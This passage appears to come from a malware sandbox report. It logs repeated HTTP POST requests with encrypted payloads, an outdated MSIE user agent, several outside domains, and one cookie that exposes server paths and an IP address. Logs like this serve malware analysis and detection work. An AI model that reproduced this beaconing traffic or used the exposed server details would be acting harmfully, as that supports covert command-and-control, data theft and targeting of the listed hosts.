pN30JX1HyNA2m6PDNGJLnrZEkPOrHM7+ATgA1JZ9+Cw4c9cbA6Z3yeq8B72ZXw+tt5lLK9108rLGtRRgYnzq//XR7RTd3JPQ3oGfePuV/rE+pe3Nmnrl5m0sI1unCQBmvCk9NlXbugL+6FR2MX9KDJ7RY+qEXqRkmcWeUEcP51Dr1JzWAqUOXXAXFN+ORNczZO1Tt4rq57d//rzO45q/TVPzI9gqLfRTbJX+rNHoVKBPtGAjol+ZDv+EFgS+s2P7p3w8azasiu5Z27rph3p0/sJgihewq+nTjGiFvuTRPwxmVyoqhItvjVNojcl+Ld5Q5XOfTYJoBxHGGycCAXLPB/wXg13aRrMlZ386we+NjHb7QnfXFOzZpvbTUWY9UMOjj3J97DAt4yrcrQ1bzaZGNkuPcA6NsKMRrbLfIcSf0mxbrX0tE6mfgqiU57jzET5mWSZ0pOq5aO6X0FOpZ93pwId5nNGob7BNF9MDme2oPwmxo6qLJv+oJYJp0sZRifl078UL9l9uMomCOhKma4lK9w==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.domon.comCache-Control: no-cacheData Raw: 30 4d 41 53 69 62 37 50 30 39 43 49 78 49 47 54 69 54 53 45 68 61 47 58 58 4d 56 2b 4a 47 44 43 30 73 73 30 38 67 62 6b 6f 54 53 54 6c 54 70 62 42 30 37 4c 54 57 70 75 4e 30 39 35 65 78 37 58 30 74 67 45 63 70 39 4d 65 37 69 4c 50 37 59 76 4d 5a 38 5a 49 32 72 70 59 32 58 42 52 6e 37 63 57 6f 44 46 71 34 36 42 46 56 43 67 39 77 46 33 2f 4f 4c 78 52 6e 2b 58 63 45 53 30 4f 75 56 49 67 68 35 33 44 70 43 59 2f 67 67 44 67 6f 68 53 42 76 50 33 44 4b 70 43 50 31 64 7a 2f 45 50 2f 33 79 44 6f 45 4d 6c 78 6e 2b 42 71 35 55 43 6e 49 48 35 77 6d 38 6b 74 6b 34 7a 63 34 49 57 32 62 2f 4d 55 6b 46 39 42 58 2f 4f 45 39 31 6a 6c 72 47 36 2b 33 31 64 6e 33 30 41 51 53 64 43 50 59 77 7a 68 2b 50 6d 65 58 30 63 7a 71 77 64 33 4d 41 56 42 33 5a 46 42 58 51 41 49 4b 39 50 5a 7a 64 45 63 44 68 6a 31 68 51 44 42 42 79 4c 4a 74 46 6c 48 32 33 31 34 73 33 65 46 77 30 42 78 67 34 49 30 47 52 41 66 51 67 30 74 34 47 76 77 6d 62 35 48 73 38 2b 44 5a 2b 37 42 2f 61 2b 57 49 61 43 61 73 54 49 67 4e 78 6b 45 72 62 71 68 6a 73 70 36 59 64 6a 5a 6a 45 76 61 76 76 48 41 4f 49 48 4a 7a 51 6d 74 51 43 52 72 56 61 76 6e 6d 48 63 6e 72 75 49 5a 38 41 50 42 64 4b 62 39 34 61 69 69 4b 36 4f 46 75 77 64 2f 38 64 48 64 68 6a 42 51 64 76 75 38 6f 77 66 43 53 4a 4a 6a 52 37 59 7a 69 58 45 35 32 77 43 6e 6a 48 76 45 43 72 72 50 35 4a 74 57 65 75 39 78 66 59 62 33 2b 62 58 71 6d 51 58 78 72 50 73 4d 63 2b 44 4f 52 43 79 61 59 58 6b 78 2f 4f 39 30 48 50 4c 6c 4a 33 45 48 57 6c 6b 62 49 5a 36 63 4c 66 64 69 6d 2f 41 39 67 41 4c 36 4c 55 61 66 73 41 4a 75 64 6b 47 38 51 56 39 56 4f 43 74 30 6f 69 33 6f 39 56 30 3d Data Ascii: 0MASib7P09CIxIGTiTSEhaGXXMV+JGDC0ss08gbkoTSTlTpbB07LTWpuN095ex7X0tgEcp9Me7iLP7YvMZ8ZI2rpY2XBRn7cWoDFq46BFVCg9wF3/OLxRn+XcES0OuVIgh53DpCY/ggDgohSBvP3DKpCP1dz/EP/3yDoEMlxn+Bq5UCnIH5wm8ktk4zc4IW2b/MUkF9BX/OE91jlrG6+31dn30AQSdCPYwzh+PmeX0czqwd3MAVB3ZFBXQAIK9PZzdEcDhj1hQDBByLJtFlH2314s3eFw0Bxg4I0GRAfQg0t4Gvwmb5Hs8+DZ+7B/a+WIaCasTIgNxkErbqhjsp6YdjZjEvavvHAOIHJzQmtQCRrVavnmHcnruIZ8APBdKb94aiiK6OFuwd/8dHdhjBQdvu8owfCSJJjR7YziXE52wCnjHvECrrP5JtWeu9xfYb3+bXqmQXxrPsMc+DORCyaYXkx/O90HPLlJ3EHWlkbIZ6cLfdim/A9gAL6LUafsAJudkG8QV9VOCt0oi3o9V0=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.myropcb.comCache-Control: no-cacheCookie: myro_ct_dtl=eyJSRVFVRVNUX1VSSSI6IlwvIiwiUkVESVJFQ1RfVU5JUVVFX0lEIjoiWk1MSy1KcEcxblpSTGwyUFJGNUhld0FBQUJzIiwiUkVESVJFQ1RfU0NSSVBUX1VSTCI6IlwvIiwiUkVESVJFQ1RfU0NSSVBUX1VSSSI6Imh0dHA6XC9cL3d3dy5teXJvcGNiLmNvbVwvIiwiUkVESVJFQ1RfRE9DVU1FTlRfUk9PVCI6Ilwva3VuZGVuXC9ob21lcGFnZXNcLzlcL2QzMjgxNTE4NDdcL2h0ZG9jc1wvY2xpY2thbmRidWlsZHNcL215cm9wY2IiLCJSRURJUkVDVF9IVFRQX0FVVEhPUklaQVRJT04iOiIiLCJSRURJUkVDVF9IQU5ETEVSIjoieC1tYXBwLXBocDUiLCJSRURJUkVDVF9TVEFUVVMiOiIyMDAiLCJVTklRVUVfSUQiOiJaTUxLLUpwRzFuWlJMbDJQUkY1SGV3QUFBQnMiLCJTQ1JJUFRfVVJMIjoiXC8iLCJTQ1JJUFRfVVJJIjoiaHR0cDpcL1wvd3d3Lm15cm9wY2IuY29tXC8iLCJIVFRQX0hPU1QiOiJ3d3cubXlyb3BjYi5jb20iLCJDT05URU5UX0xFTkdUSCI6IjU1NiIsIkhUVFBfQUNDRVBUIjoiKlwvKiIsIkhUVFBfQUNDRVBUX0xBTkdVQUdFIjoiZW4tdXMiLCJDT05URU5UX1RZUEUiOiJhcHBsaWNhdGlvblwvb2N0ZXQtc3RyZWFtIiwiSFRUUF9VU0VSX0FHRU5UIjoiTW96aWxsYVwvNC4wIChjb21wYXRpYmxlOyBNU0lFIDYuMDsgV2luZG93cyBOVCA1LjE7IFNWMSkiLCJIVFRQX0NBQ0hFX0NPTlRST0wiOiJuby1jYWNoZSIsIlJFTU9URV9BRERSIjoiODQuMTcuNTIuNDMiLCJSRVFVRVNUX1NDSEVNRSI6Imh0dHAiLCJDT05URVhUX1BSRUZJWCI6Ilwvc3lzdGVtLWJpblwvIiwiQ09OVEVYVF9ET0NVTUVOVF9ST09UIjoiXC9rdW5kZW5cL3VzclwvbGliXC9jZ2ktYmluXC8iLCJSRU1PVEVfUE9SVCI6IjYwNzc0IiwiUkVESVJFQ1RfVVJMIjoiXC9pbmRleC5waHAiLCJSRVFVRVNUX01FVEhPRCI6IlBPU1QiLCJRVUVSWV9TVFJJTkciOiIiLCJTQ1JJUFRfTkFNRSI6IlwvaW5kZXgucGhwIiwiU1RBVFVTIjoiMjAwIiwiT1JJR19QQVRIX0lORk8iOiJcL2luZGV4LnBocCIsIk9SSUdfUEFUSF9UUkFOU0xBVEVEIjoiXC9rdW5kZW5cL2hvbWVwYWdlc1wvOVwvZDMyODE1MTg0N1wvaHRkb2NzXC9jbGlja2FuZGJ1aWxkc1wvbXlyb3BjYlwvaW5kZXgucGhwIiwiUEhQX1NFTEYiOiJcL2luZGV4LnBocCIsIlJFUVVFU1RfVElNRV9GTE9BVCI6MTY5MDQ4NzU0OC41MDc5MDksIlJFUVVFU1RfVElNRSI6MTY5MDQ4NzU0OCwiYXJndiI6W10sImFyZ2MiOjB9; myro_ct=eyJ1cmwiOiIiLCJpcCI6Ijg0LjE3LjUyLjQzIn0%3D; shield-notbot-nonce=6077383c26
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.koz1.netCache-Control: no-cacheCookie: btst=8e12fd1539699ac6bdaab177f131d683|84.17.52.43|1690487582|1690487547|17|2|0; snkz=84.17.52.43Data Raw: 70 4e 33 30 4a 58 31 48 79 4e 41 32 6d 36 50 44 4e 47 4a 4c 6e 72 5a 45 6b 50 4f 72 48 4d 37 2b 41 54 67 41 31 4a 5a 39 2b 43 77 34 63 39 63 62 41 36 5a 33 79 65 71 38 42 37 32 5a 58 77 2b 74 74 35 6c 4c 4b 39 31 30 38 72 4c 47 74 52 52 67 59 6e 7a 71 2f 2f 58 52 37 52 54 64 33 4a 50 51 33 6f 47 66 65 50 75 56 2f 72 45 2b 70 65 33 4e 6d 6e 72 6c 35 6d 30 73 49 31 75 6e 43 51 42 6d 76 43 6b 39 4e 6c 58 62 75 67 4c 2b 36 46 52 32 4d 58 39 4b 44 4a 37 52 59 2b 71 45 58 71 52 6b 6d 63 57 65 55 45 63 50 35 31 44 72 31 4a 7a 57 41 71 55 4f 58 58 41 58 46 4e 2b 4f 52 4e 63 7a 5a 4f 31 54 74 34 72 71 35 37 64 2f 2f 72 7a 4f 34 35 71 2f 54 56 50 7a 49 39 67 71 4c 66 52 54 62 4a 58 2b 72 4e 48 6f 56 4b 42 50 74 47 41 6a 6f 6c 2b 5a 44 76 2b 45 46 67 53 2b 73 32 50 37 70 33 77 38 61 7a 61 73 69 75 35 5a 32 37 72 70 68 33 70 30 2f 73 4a 67 69 68 65 77 71 2b 6e 54 6a 47 69 46 76 75 54 52 50 77 78 6d 56 79 6f 71 68 49 74 76 6a 56 4e 6f 6a 63 6c 2b 4c 64 35 51 35 58 4f 66 54 59 4a 6f 42 78 48 47 47 79 63 43 41 58 4c 50 42 2f 77 58 67 31 33 61 52 72 4d 6c 5a 33 38 36 77 65 2b 4e 6a 48 62 37 51 6e 66 58 46 4f 7a 5a 70 76 62 54 55 57 59 39 55 4d 4f 6a 6a 33 4a 39 37 44 41 74 34 79 72 63 72 51 31 62 7a 61 5a 47 4e 6b 75 50 63 41 36 4e 73 4b 4d 52 72 62 4c 66 49 63 53 66 30 6d 78 62 72 58 30 74 45 36 6d 66 67 71 69 55 35 37 6a 7a 45 54 35 6d 57 53 5a 30 70 4f 71 35 61 4f 36 58 30 46 4f 70 5a 39 33 70 77 49 64 35 6e 4e 47 6f 62 37 42 4e 46 39 4d 44 6d 65 32 6f 50 77 6d 78 6f 36 71 4c 4a 76 2b 6f 4a 59 4a 70 30 73 5a 52 69 66 6c 30 37 38 55 4c 39 6c 39 75 4d 6f 6d 43 4f 68 4b 6d 61 34 6c 4b 39 77 3d 3d Data Ascii: pN30JX1HyNA2m6PDNGJLnrZEkPOrHM7+ATgA1JZ9+Cw4c9cbA6Z3yeq8B72ZXw+tt5lLK9108rLGtRRgYnzq//XR7RTd3JPQ3oGfePuV/rE+pe3Nmnrl5m0sI1unCQBmvCk9NlXbugL+6FR2MX9KDJ7RY+qEXqRkmcWeUEcP51Dr1JzWAqUOXXAXFN+ORNczZO1Tt4rq57d//rzO45q/TVPzI9gqLfRTbJX+rNHoVKBPtGAjol+ZDv+EFgS+s2P7p3w8azasiu5Z27rph3p0/sJgihewq+nTjGiFvuTRPwxmVyoqhItvjVNojcl+Ld5Q5XOfTYJoBxHGGycCAXLPB/wXg13aRrMlZ386we+NjHb7QnfXFOzZpvbTUWY9UMOjj3J97DAt4yrcrQ1bzaZGNkuPcA6NsKMRrbLfIcSf0mxbrX0tE6mfgqiU57jzET5mWSZ0pOq5aO6X0FOpZ93pwId5nNGob7BNF9MDme2oPwmxo6qLJv+oJYJp0sZRifl078UL9l9uMomCOhKma4lK9w==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 66 53 6e 61 38 74 6f 76 38 4e 44 48 44 54 78 71 2f 54 33 38 4e 78 30 61 77 70 54 4b 50 4b 46 36 72 6f 63 38 42 67 6f 73 61 4a 32 72 59 2f 76 36 2b 63 57 57 72 2b 78 69 37 30 4a 65 75 41 36 63 4e 6a 39 4b 30 59 2b 44 4a 33 41 51 47 6a 7a 55 42 61 72 2b 39 32 4c 52 4b 42 56 50 6c 62 4e 68 6a 46 2b 57 68 43 6d 46 37 73 34 30 4d 67 36 38 6e 6b 37 62 68 4b 64 71 2f 4b 76 73 62 34 47 6e 34 4f 67 35 61 58 31 52 6a 70 72 6f 6c 78 34 50 31 63 76 6c 58 35 66 42 63 73 59 71 58 6b 59 4c 33 50 61 64 4e 36 43 6c 57 64 6e 30 4e 32 6f 4c 4c 38 55 49 77 43 47 55 57 43 76 76 6c 6c 61 34 33 6c 36 39 6e 4a 52 50 6d 71 5a 59 6a 37 61 79 53 58 52 2f 37 6c 77 79 72 58 69 36 66 6e 7a 35 75 75 4b 47 67 4c 77 76 37 57 38 71 75 50 4b 4e 61 38 48 5a 53 4d 75 41 4c 46 53 77 42 49 51 42 56 74 37 79 39 79 32 47 42 4f 74 62 39 78 70 74 48 64 74 36 47 5a 31 33 47 62 69 36 48 79 51 38 46 56 37 59 39 55 6b 34 77 57 41 35 64 79 79 76 30 77 46 49 46 41 4a 46 64 41 6c 62 72 48 77 4c 71 42 44 56 71 45 59 4d 4b 6a 4b 31 69 61 6b 61 6b 44 64 47 52 34 50 53 4f 59 65 4e 30 38 57 56 38 73 32 5a 78 77 78 43 4e 38 43 54 72 7a 4c 53 5a 76 45 46 31 6a 5a 79 63 64 49 6b 2f 62 58 54 62 33 71 38 51 6e 73 71 46 31 31 7a 41 69 5a 36 50 4a 78 71 75 44 39 56 67 73 63 59 47 34 6f 65 41 4e 55 54 39 32 6f 4e 52 72 6d 38 54 4d 6c 74 4a 49 69 4d 39 56 46 65 5a 43 79 68 44 47 79 63 55 56 71 44 63 6c 67 4d 44 59 55 4d 41 77 41 45 70 46 6f 63 4f 67 46 34 64 4d 59 66 71 46 6a 30 37 51 31 71 68 75 4d 6c 48 37 73 6a 48 2b 6c 59 34 74 76 73 34 61 2b 46 6f 45 34 2f 62 46 68 56 6c 6c 61 79 6b 77 62 41 4b 55 55 4d 64 71 77 68 74 66 77 46 54 46 68 37 45 34 4f 54 55 66 47 6f 2f 38 4f 54 4d 4e 64 6f 38 49 57 63 37 76 73 6d 45 54 6a 2f 30 30 4f 2f 58 48 49 53 34 2f 4d 53 70 47 6f 3d Data Ascii: fSna8tov8NDHDTxq/T38Nx0awpTKPKF6roc8BgosaJ2rY/v6+cWWr+xi70JeuA6cNj9K0Y+DJ3AQGjzUBar+92LRKBVPlbNhjF+WhCmF7s40Mg68nk7bhKdq/Kvsb4Gn4Og5aX1Rjprolx4P1cvlX5fBcsYqXkYL3PadN6ClWdn0N2oLL8UIwCGUWCvvlla43l69nJRPmqZYj7aySXR/7lwyrXi6fnz5uuKGgLwv7W8quPKNa8HZSMuALFSwBIQBVt7y9y2GBOtb9xptHdt6GZ13Gbi6HyQ8FV7Y9Uk4wWA5dyyv0wFIFAJFdAlbrHwLqBDVqEYMKjK1iakakDdGR4PSOYeN08WV8s2ZxwxCN8CTrzLSZvEF1jZycdIk/bXTb3q8QnsqF11zAiZ6PJxquD9VgscYG4oeANUT92oNRrm8TMltJIiM9VFeZCyhDGycUVqDclgMDYUMAwAEpFocOgF4dMYfqFj07Q1qhuMlH7sjH+lY4tvs4a+FoE4/bFhVllaykwbAKUUMdqwhtfwFTFh7E4OTUfGo/8OTMNdo8IWc7vsmETj/00O/XHIS4/MSpGo=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.holleman.usCache-Control: no-cacheData Raw: 4f 6e 32 57 32 39 2b 36 63 74 41 55 68 53 51 30 50 6b 70 2b 79 47 69 6f 2f 51 65 31 47 48 64 61 67 38 44 37 62 43 78 76 67 49 65 66 71 73 64 32 77 64 46 73 70 33 68 6b 2b 5a 67 53 4e 64 65 56 70 63 53 43 34 6d 59 74 6d 75 78 45 69 69 61 4b 6d 57 51 6c 30 42 4b 41 37 42 42 61 6d 43 33 48 65 67 37 65 4e 2f 79 48 4e 57 6f 4c 62 6d 62 67 31 75 47 63 7a 38 61 76 31 31 44 77 66 49 6d 2b 6b 74 45 47 56 70 77 53 41 58 43 2b 4f 73 66 39 6d 38 39 4b 66 64 30 77 4c 48 78 4e 68 68 42 44 6a 32 7a 77 77 56 30 4e 58 74 79 69 4b 41 43 4c 66 42 4c 75 32 64 50 6a 73 66 73 62 7a 47 4e 48 74 66 4c 4d 72 62 37 75 68 53 31 4e 54 4a 58 54 73 53 45 48 51 44 45 46 30 32 6d 30 2b 37 77 4e 73 6c 35 78 58 50 35 54 78 70 6f 67 79 54 2b 64 6a 44 56 53 66 50 4d 51 6a 6d 6d 65 35 56 67 48 68 75 2b 35 7a 68 49 47 76 35 68 37 4b 6a 32 6f 45 4f 71 4c 65 2b 6e 6f 37 43 79 45 55 4b 74 70 74 58 53 4f 73 36 6b 70 64 41 31 2b 34 53 33 31 50 5a 45 36 5a 70 69 35 4d 69 47 55 6e 6b 58 65 30 67 6c 5a 36 43 56 43 6a 2b 44 42 6b 50 62 56 4b 32 62 53 55 74 54 4f 54 4b 75 51 78 69 6f 73 42 6d 78 56 49 59 77 4e 63 44 46 67 61 46 63 47 2f 38 39 63 35 4d 37 77 78 41 54 76 70 70 65 50 2f 74 71 7a 33 61 75 62 41 41 4b 4b 37 49 58 61 6b 31 4f 58 76 39 48 78 68 48 57 67 43 31 55 54 72 2f 77 75 72 77 37 38 66 51 6d 30 6f 33 52 53 74 6c 45 72 5a 74 42 42 73 39 68 61 77 50 4b 34 4a 66 54 71 74 68 47 5a 47 32 57 2b 38 4c 76 61 7a 79 51 45 56 58 66 55 35 35 49 4e 79 68 47 47 58 70 36 77 50 42 4b 54 55 34 46 43 39 78 6a 74 6e 36 30 5a 5a 47 41 6b 6f 34 56 64 4c 64 70 6e 34 2f 51 4b 6a 71 79 68 33 54 47 67 62 65 2b 79 49 69 53 4f 4f 38 45 46 64 76 37 50 4a 62 49 41 78 56 61 63 6d 46 59 6a 46 44 71 7a 42 75 75 72 4b 43 31 65 32 2b 62 53 6b 53 50 48 36 79 32 7a 62 61 4d 3d Data Ascii: On2W29+6ctAUhSQ0Pkp+yGio/Qe1GHdag8D7bCxvgIefqsd2wdFsp3hk+ZgSNdeVpcSC4mYtmuxEiiaKmWQl0BKA7BBamC3Heg7eN/yHNWoLbmbg1uGcz8av11DwfIm+ktEGVpwSAXC+Osf9m89Kfd0wLHxNhhBDj2zwwV0NXtyiKACLfBLu2dPjsfsbzGNHtfLMrb7uhS1NTJXTsSEHQDEF02m0+7wNsl5xXP5TxpogyT+djDVSfPMQjmme5VgHhu+5zhIGv5h7Kj2oEOqLe+no7CyEUKtptXSOs6kpdA1+4S31PZE6Zpi5MiGUnkXe0glZ6CVCj+DBkPbVK2bSUtTOTKuQxiosBmxVIYwNcDFgaFcG/89c5M7wxATvppeP/tqz3aubAAKK7IXak1OXv9HxhHWgC1UTr/wurw78fQm0o3RStlErZtBBs9hawPK4JfTqthGZG2W+8LvazyQEVXfU55INyhGGXp6wPBKTU4FC9xjtn60ZZGAko4VdLdpn4/QKjqyh3TGgbe+yIiSOO8EFdv7PJbIAxVacmFYjFDqzBuurKC1e2+bSkSPH6y2zbaM=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 66 53 6e 61 38 74 6f 76 38 4e 44 48 44 54 78 71 2f 54 33 38 4e 78 30 61 77 70 54 4b 50 4b 46 36 72 6f 63 38 42 67 6f 73 61 4a 32 72 59 2f 76 36 2b 63 57 57 72 2b 78 69 37 30 4a 65 75 41 36 63 4e 6a 39 4b 30 59 2b 44 4a 33 41 51 47 6a 7a 55 42 61 72 2b 39 32 4c 52 4b 42 56 50 6c 62 4e 68 6a 46 2b 57 68 43 6d 46 37 73 34 30 4d 67 36 38 6e 6b 37 62 68 4b 64 71 2f 4b 76 73 62 34 47 6e 34 4f 67 35 61 58 31 52 6a 70 72 6f 6c 78 34 50 31 63 76 6c 58 35 66 42 63 73 59 71 58 6b 59 4c 33 50 61 64 4e 36 43 6c 57 64 6e 30 4e 32 6f 4c 4c 38 55 49 77 43 47 55 57 43 76 76 6c 6c 61 34 33 6c 36 39 6e 4a 52 50 6d 71 5a 59 6a 37 61 79 53 58 52 2f 37 6c 77 79 72 58 69 36 66 6e 7a 35 75 75 4b 47 67 4c 77 76 37 57 38 71 75 50 4b 4e 61 38 48 5a 53 4d 75 41 4c 46 53 77 42 49 51 42 56 74 37 79 39 79 32 47 42 4f 74 62 39 78 70 74 48 64 74 36 47 5a 31 33 47 62 69 36 48 79 51 38 46 56 37 59 39 55 6b 34 77 57 41 35 64 79 79 76 30 77 46 49 46 41 4a 46 64 41 6c 62 72 48 77 4c 71 42 44 56 71 45 59 4d 4b 6a 4b 31 69 61 6b 61 6b 44 64 47 52 34 50 53 4f 59 65 4e 30 38 57 56 38 73 32 5a 78 77 78 43 4e 38 43 54 72 7a 4c 53 5a 76 45 46 31 6a 5a 79 63 64 49 6b 2f 62 58 54 62 33 71 38 51 6e 73 71 46 31 31 7a 41 69 5a 36 50 4a 78 71 75 44 39 56 67 73 63 59 47 34 6f 65 41 4e 55 54 39 32 6f 4e 52 72 6d 38 54 4d 6c 74 4a 49 69 4d 39 56 46 65 5a 43 79 68 44 47 79 63 55 56 71 44 63 6c 67 4d 44 59 55 4d 41 77 41 45 70 46 6f 63 4f 67 46 34 64 4d 59 66 71 46 6a 30 37 51 31 71 68 75 4d 6c 48 37 73 6a 48 2b 6c 59 34 74 76 73 34 61 2b 46 6f 45 34 2f 62 46 68 56 6c 6c 61 79 6b 77 62 41 4b 55 55 4d 64 71 77 68 74 66 77 46 54 46 68 37 45 34 4f 54 55 66 47 6f 2f 38 4f 54 4d 4e 64 6f 38 49 57 63 37 76 73 6d 45 54 6a 2f 30 30 4f 2f 58 48 49 53 34 2f 4d 53 70 47 6f 3d Data Ascii: fSna8tov8NDHDTxq/T38Nx0awpTKPKF6roc8BgosaJ2rY/v6+cWWr+xi70JeuA6cNj9K0Y+DJ3AQGjzUBar+92LRKBVPlbNhjF+WhCmF7s40Mg68nk7bhKdq/Kvsb4Gn4Og5aX1Rjprolx4P1cvlX5fBcsYqXkYL3PadN6ClWdn0N2oLL8UIwCGUWCvvlla43l69nJRPmqZYj7aySXR/7lwyrXi6fnz5uuKGgLwv7W8quPKNa8HZSMuALFSwBIQBVt7y9y2GBOtb9xptHdt6GZ13Gbi6HyQ8FV7Y9Uk4wWA5dyyv0wFIFAJFdAlbrHwLqBDVqEYMKjK1iakakDdGR4PSOYeN08WV8s2ZxwxCN8CTrzLSZvEF1jZycdIk/bXTb3q8QnsqF11zAiZ6PJxquD9VgscYG4oeANUT92oNRrm8TMltJIiM9VFeZCyhDGycUVqDclgMDYUMAwAEpFocOgF4dMYfqFj07Q1qhuMlH7sjH+lY4tvs4a+FoE4/bFhVllaykwbAKUUMdqwhtfwFTFh7E4OTUfGo/8OTMNdo8IWc7vsmETj/00O/XHIS4/MSpGo=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.yoruksut.comCache-Control: no-cacheData Raw: 68 2b 4c 32 43 64 31 78 4d 39 48 42 6f 79 53 42 46 4d 6e 2b 65 52 62 43 69 61 4b 4c 74 6a 55 69 59 5a 68 51 4b 78 58 70 46 4b 6f 42 2b 62 6f 43 68 58 4d 45 6b 38 35 4f 53 75 57 77 4b 30 74 55 79 6d 43 52 33 75 6c 46 72 38 39 39 31 37 70 76 68 72 46 31 72 71 4e 6f 33 56 2b 36 51 48 45 70 70 55 50 6a 69 4d 4b 52 75 50 4e 38 4e 56 64 2f 2f 59 4c 37 6c 2f 34 51 59 38 6f 50 2f 2f 49 69 33 72 44 6a 53 59 41 49 39 42 72 49 36 50 45 6b 4f 4c 61 30 37 72 65 77 74 47 68 37 39 4e 57 39 53 4b 38 38 62 4f 6c 4f 79 30 44 68 34 76 6b 73 47 39 35 65 68 55 65 76 6f 56 31 78 58 4f 76 75 2b 51 49 67 71 6d 78 69 66 61 33 63 56 2b 34 7a 49 2f 43 4e 69 6d 37 75 44 46 73 76 78 77 75 77 2f 72 78 2f 43 30 45 46 53 32 4c 70 63 2b 6e 53 58 51 6a 46 47 5a 6b 77 35 57 58 44 52 58 54 37 47 59 59 2f 57 64 6b 4a 53 30 6c 78 46 37 67 4d 61 37 31 69 33 65 6c 78 79 74 41 43 47 57 53 6e 67 6a 51 45 67 37 56 71 6d 4a 44 4d 6a 63 79 46 6c 65 35 72 4e 30 70 37 52 49 71 47 75 54 41 66 34 67 77 2f 2f 6e 2f 34 55 54 52 78 74 65 65 68 6d 41 76 4f 71 39 47 35 45 54 78 70 65 4a 62 36 72 67 73 53 2b 68 43 5a 2b 2b 4d 45 41 62 2b 38 34 52 64 69 66 67 75 7a 58 36 58 35 62 64 4d 65 43 39 42 69 55 47 38 69 77 49 7a 39 39 67 67 30 55 35 32 38 51 59 62 41 77 78 42 36 67 66 67 30 79 38 58 5a 65 71 6c 55 38 70 4b 56 57 50 38 33 58 43 74 67 43 73 52 6b 66 77 6b 4a 6e 55 36 6d 38 45 34 6d 73 54 34 59 61 44 62 67 61 54 33 6a 70 41 76 74 35 79 6b 56 62 55 4a 6c 69 57 33 4f 64 50 2b 64 63 70 78 34 72 72 55 6b 6b 4f 4b 4e 74 67 4b 63 6f 51 62 70 6d 6f 69 4c 69 74 67 77 5a 4d 61 56 62 48 76 6f 70 6a 49 4b 4b 31 6d 31 6a 53 63 37 47 31 2b 75 62 64 43 4a 36 43 55 2f 69 30 6f 32 66 59 73 2f 4c 47 6a 34 Data Ascii: h+L2Cd1xM9HBoySBFMn+eRbCiaKLtjUiYZhQKxXpFKoB+boChXMEk85OSuWwK0tUymCR3ulFr89917pvhrF1rqNo3V+6QHEppUPjiMKRuPN8NVd//YL7l/4QY8oP//Ii3rDjSYAI9BrI6PEkOLa07rewtGh79NW9SK88bOlOy0Dh4vksG95ehUevoV1xXOvu+QIgqmxifa3cV+4zI/CNim7uDFsvxwuw/rx/C0EFS2Lpc+nSXQjFGZkw5WXDRXT7GYY/WdkJS0lxF7gMa71i3elxytACGWSngjQEg7VqmJDMjcyFle5rN0p7RIqGuTAf4gw//n/4UTRxteehmAvOq9G5ETxpeJb6rgsS+hCZ++MEAb+84RdifguzX6X5bdMeC9BiUG8iwIz99gg0U528QYbAwxB6gfg0y8XZeqlU8pKVWP83XCtgCsRkfwkJnU6m8E4msT4YaDbgaT3jpAvt5ykVbUJliW3OdP+dcpx4rrUkkOKNtgKcoQbpmoiLitgwZMaVbHvopjIKK1m1jSc7G1+ubdCJ6CU/i0o2fYs/LGj4
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 38 38 37 6f 59 33 44 4d 44 4e 48 2f 65 61 59 47 67 2f 56 35 36 69 4e 64 75 36 6f 59 50 43 7a 61 70 49 71 69 4d 4a 6f 63 68 59 68 52 43 34 37 32 47 6d 78 52 4d 6a 6e 30 61 43 66 36 2f 78 6c 53 43 4c 46 4e 52 65 38 43 31 67 58 35 2f 6e 36 68 76 45 46 38 36 37 4d 4f 33 70 45 37 51 4d 76 53 4d 75 5a 4d 34 77 47 6e 7a 31 7a 45 66 45 62 64 77 55 76 39 5a 6e 71 6e 32 52 5a 6c 50 2b 31 4a 34 79 66 55 68 44 47 58 42 4f 61 58 58 7a 41 78 38 71 4b 76 6f 78 32 4b 66 79 76 32 54 68 66 73 4c 6b 56 77 31 7a 6f 4d 70 74 70 6c 4e 5a 69 4f 45 5a 58 37 7a 49 47 30 79 7a 51 78 30 56 6a 41 39 31 4e 39 58 58 6a 69 30 42 67 6b 35 79 2f 68 4b 58 43 74 79 6f 4d 4f 4d 6c 6c 54 38 75 5a 4b 30 68 7a 41 48 4b 68 39 6e 76 57 4d 2b 32 6b 72 2b 51 32 54 47 63 56 54 6f 62 41 70 4c 66 79 6c 2f 4e 53 52 61 42 57 67 44 4c 66 70 55 30 68 69 62 49 61 51 6b 6b 6c 4e 6b 35 6c 76 36 38 50 76 50 41 70 77 44 4c 4d 41 50 76 41 6c 65 73 52 62 52 32 43 4e 4c 74 79 32 4a 4c 75 61 6f 7a 37 4c 6e 4d 4b 2f 74 64 37 62 49 75 44 51 73 49 34 33 6b 73 62 6b 35 7a 35 66 77 31 52 38 5a 45 53 66 66 76 6d 5a 6c 41 78 43 65 61 66 4d 6e 69 5a 4b 72 6b 35 